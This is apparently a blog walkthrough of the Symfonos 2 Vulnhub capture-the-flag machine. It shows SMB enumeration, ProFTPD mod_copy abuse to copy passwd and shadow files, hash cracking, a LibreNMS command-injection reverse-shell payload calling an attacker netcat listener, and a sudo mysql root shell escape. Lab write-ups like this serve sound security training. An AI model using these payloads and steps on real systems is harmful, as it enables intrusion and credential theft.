Hackatua - April 23, 2023Symfonos 2
Walkthrough of the Symfonos 2 machine from Vulnhub
Obtaining the target machine's IP address
The first thing we are going to do is try to find out what is the target machine IP. To do this we will use nmap to indicate that we want to do a ping scan (-sn) for the entire network we are currently on. If we are not as a root user it is recommended to use sudo to obtain additional information of the devices that are in the network:
nmap -sn 192.168.56.0/24
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 08:35 CEST Nmap scan report for 192.168.56.1 Host is up (0.00052s latency). Nmap scan report for 192.168.56.13 Host is up (0.00016s latency). Nmap scan report for 192.168.56.15 Host is up (0.00051s latency). Nmap done: 256 IP addresses (3 hosts up) scanned in 2.95 seconds
Nmap tells us that the IP of the target machine is the following (since the first is the IP of the router and the second is the IP of the attacking machine):
192.168.56.15
In case it is a virtual machine we can verify it by checking if the MAC addresses of the network cards match.
The next thing we are going to do is to add the IP of the target machine to our /etc/hosts. This way we won't need to remember the IP and we can use whatever name we give it. We edit the /etc/hosts file and add the following line at the end of it:
192.168.56.15 symfonos2.ctf
Now if we run ping symfonos2.ctf -c 1 we should get the following response:
PING symfonos2.ctf (192.168.56.15) 56(84) bytes of data. 64 bytes from symfonos2.ctf (192.168.56.15): icmp_seq=1 ttl=64 time=0.651 ms --- symfonos2.ctf ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.651/0.651/0.651/0.000 ms
This confirms that it correctly resolves the hostname we have assigned to it.
Port scanning
Once we have the IP of the target machine, what we are going to do is try to detect the ports it has open. To do this we will launch another scan with nmap against the entire port range (-p-) using the fastest timing template (-T5), filtering by the open ports (--open), and disabling DNS resolution (-n) and host discovery (-Pn):
nmap -p- -T5 --open -Pn -n symfonos2.ctf
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 08:51 CEST Nmap scan report for symfonos2.ctf (192.168.56.15) Host is up (0.00013s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
From this scan we obtain that the following ports are open: 21 (FTP), 22 (SSH), 80 (HTTP), 139 (NETBIOS-SSN) and 445 (MICROSOFT-DS). Knowing that these ports are open, the next thing we are going to do is to try to detect which services are being exposed and their versions (-sCV):
nmap -p 21,22,80,139,445 -sCV symfonos2.ctf
Result:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 08:53 CEST Nmap scan report for symfonos2.ctf (192.168.56.15) Host is up (0.00036s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 9df85f8720e58cfa68477d716208adb9 (RSA) | 256 042abb0656ead1931cd2780a00469d85 (ECDSA) |_ 256 28adacdc7e2a1cf64c6b47f2d6225b52 (ED25519) 80/tcp open http WebFS httpd 1.21 |_http-server-header: webfs/1.21 |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: symfonos2 | NetBIOS computer name: SYMFONOS2\x00 | Domain name: \x00 | FQDN: symfonos2 |_ System time: 2023-04-23T03:53:58-05:00 |_clock-skew: mean: 3h39m55s, deviation: 2h53m12s, median: 1h59m55s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2023-04-23T08:53:58 |_ start_date: N/A |_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox) | smb2-security-mode: | 311: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.91 seconds
From the result of the more detailed scan we obtain the following:
21/tcp: FTP - ProFTPD 1.3.522/tcp: SSH - OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80/tcp: HTTP - WebFS httpd 1.21139/tcp: NETBIOS-SSN - Samba smbd 3.X - 4.X445/tcp: NETBIOS-SSN - Samba smbd 4.5.16-Debian
Enumeration of the SAMBA service (445/SMB)
In the port scan we have seen that the SMB service, which is used for file sharing, is exposed. In many cases no authentication is required to access these shared files, so let's use smbclient to try to list (-L) the shared resources:
smbclient -L //symfonos2.ctf
Result (pressing enter without entering a password):
Password for [WORKGROUP\parrot]: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk IPC$ IPC IPC Service (Samba 4.5.16-Debian) SMB1 disabled -- no workgroup available
The result indicates that we have a resource that can be interesting: anonymous. The next thing we are going to do is to try to connect to that resource as a guest (-U guest) to try to access the content:
smbclient //symfonos2.ctf/anonymous -U guest
Result (pressing enter without entering a password):
Try "help" to get a list of possible commands. smb: \>
Now that we are connected we list the content with the ls command:
smb: \> ls . D 0 Thu Jul 18 16:30:09 2019 .. D 0 Thu Jul 18 16:29:08 2019 backups D 0 Thu Jul 18 16:25:17 2019 19728000 blocks of size 1024. 16314092 blocks available
If we browse in the backups directory we end up finding a file in /backups/log.txt. We can download it to the attacking machine using get. If we review the file we see that it is a command log with the results of the commands. We can extract the following useful information:
- A copy of the /etc/shadow file has been made to /var/backups/shadow.bak, so both files exist.
- The /anonymous/ resource is located in the /home/aeolus/share path, which also reveals the existence of a aeolus user.
- We can connect via FTP by making use of the anonymous user without providing a password.
Now that we know this, the next thing we can do is try to copy the /var/backups/shadow.bak and /etc/passwd files via FTP to the SMB shared directory in order to access them. To do this we use the ftp command and connect. Once connected we will use site cpfr to specify the source of the copy and site cpto to specify the destination:
Connected to symfonos2.ctf. 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.15] Name (symfonos2.ctf:parrot): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 530 Login incorrect. Login failed. Remote system type is UNIX. Using binary mode to transfer files. ftp> site cpfr /etc/passwd 350 File or directory exists, ready for destination name ftp> site cpto /home/aeolus/share/passwd 250 Copy successful ftp> site cpfr /var/backups/shadow.bak 350 File or directory exists, ready for destination name ftp> site cpto /home/aeolus/share/shadow.bak 250 Copy successful ftp> exit 221 Goodbye.
Once the files are copied we connect again with smbclient and download them as we have done before. If we inspect the files we see that we have 3 users in the system:
- root
- aeolus
- cronus
Gaining access to the target machine
Having the shadow and passwd files we can try, through a brute force attack, to get the user passwords. First we prepare the hash with unshadow and try to crack it with John the Ripper:
unshadow passwd shadow.bak > unshadowed.txt john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Result (after waiting a while and stopping the process):
Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status sergioteamo (aeolus) 1g 0:00:11:06 13,32% (ETA: 15:25:15) 0.001500g/s 3147p/s 6334c/s 6334C/s Roxtar04..Ritsuka1 Use the "--show" option to display all of the cracked passwords reliably Session aborted
The result reveals that the password of the user aeolus is sergioteamo. If we try to connect using ssh we verify that it is correct and that we have access to the target machine.
Pivoting to the user cronus.
As we could see earlier in the /etc/passwd in the system also exists the user cronus, so let's try to pivot to that user.
If we list privileges with sudo -l or SUID permissions on some executable with find / -perm -4000 2>/dev/null we don't find anything interesting. One thing we can do is try to list if there are any open ports internally, so we use ss to get them:
ss -tulpn | grep LISTEN
Result:
tcp LISTEN 0 80 127.0.0.1:3306 *:* tcp LISTEN 0 50 *:139 *:* tcp LISTEN 0 128 127.0.0.1:8080 *:* tcp LISTEN 0 32 *:21 *:* tcp LISTEN 0 128 *:22 *:* tcp LISTEN 0 20 127.0.0.1:25 *:* tcp LISTEN 0 50 *:445 *:* tcp LISTEN 0 50 :::139 :::* tcp LISTEN 0 64 :::80 :::* tcp LISTEN 0 128 :::22 :::* tcp LISTEN 0 20 ::1:25 :::* tcp LISTEN 0 50 :::445 :::*
From the result we obtain that port 8080 is exposed, in addition to port 3306 (which is the default MySQL port). To be able to access this port comfortably we can make an SSH tunnel. To do this we disconnect from the current session and connect as follows:
ssh aeolus@symfonos2.ctf -L 8080:localhost:8080
This way when we establish the connection we will be able to see port 8080 of the target machine on port 8080 of the attacking machine. If we now access http://localhost:8080 we see that it redirects us to /login and displays a LibreNMS user identification panel.
If we search for "librenms exploits" in Google we find in Exploit Database is the following CVE:
If we investigate a little the exploit we see that what it does is a POST to /addhost/ including in the field "community" our payload that, in the case of the exploit, is trying to establish a reverse shell with nc {remote_host} {remote_port}. The fact that it is asking for cookies indicates that it needs to be an authenticated user. Luckily the user aeolus with password sergioteamo is valid.
The first thing we are going to do is to listen in using nc:
nc -nlvp 8888
Receiving the confirmation message that we are listening:
listening on [any] 8888 ...
Now we go to http://localhost:8080/addhost, name it "dummytest", check the "Forced add" checkbox, and in the "Comunity" field we copy the payload we saw in the script replacing our host and port: `'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.13 8888 >/tmp/f) #``
If we confirm we should receive the confirmation message that it has been successfully created. If we review the exploit script we see that the next thing we need to do is to access a URL, so we compose it and enter it in the browser:
http://localhost:8080/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=dummytest
When entering it in the browser, we verify that a connection is established in the Netcat with the one we were listening:
connect to [192.168.56.13] from (UNKNOWN) [192.168.56.15] 47470 /bin/sh: 0: can't access tty; job control turned off
If we check the user with which we are connected running whoami we see that it is the user cronus.
Privilege escalation
If we check the privileges of the user with sudo -l we see the following:
Matching Defaults entries for cronus on symfonos2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User cronus may run the following commands on symfonos2: (root) NOPASSWD: /usr/bin/mysql
As we can see, we can run the binary found in /usr/bin/mysql as root without entering a password. If we look in GTFObins we find that we can launch a shell via mysql. We execute:
sudo mysql -e '\! /bin/sh'
If we check the user we are connected with running whoami we see that it is the user root.
If we list the contents of the home directory of the user root
/rootwe find the flag (proof.txt):Congrats on rooting symphones:2! ....